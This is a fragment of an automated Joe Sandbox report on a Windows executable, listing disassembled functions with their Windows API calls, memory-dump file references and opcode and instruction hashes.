                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: SysAnimate32
                                                                                                        • API String ID: 0-1011021900
                                                                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                        Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                        • GetFocus.USER32 ref: 0046157B
                                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                        • __swprintf.LIBCMT ref: 00461608
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                        • String ID: %s%d
                                                                                                        • API String ID: 2645982514-1110647743
                                                                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                        Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                        Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 15295421-0
                                                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                        Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3539004672-0
                                                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                        Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 327565842-0
                                                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                        Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                        • String ID:
                                                                                                        • API String ID: 2832842796-0
                                                                                                        • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                        • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                        Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseDeleteOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2095303065-0
                                                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                        Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: RectWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 861336768-0
                                                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                        Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32 ref: 00449598
                                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                                                        • _wcslen.LIBCMT ref: 0044961A
                                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1856069659-0
                                                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                        Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                        • TrackPopupMenuEx.USER32(033C6420,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1300944170-0
                                                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                        Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1822080540-0
                                                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                        Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 659298297-0
                                                                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                        Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(033C1B38,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(033C1B38,000000F1,00000001,00000000), ref: 00440E9A
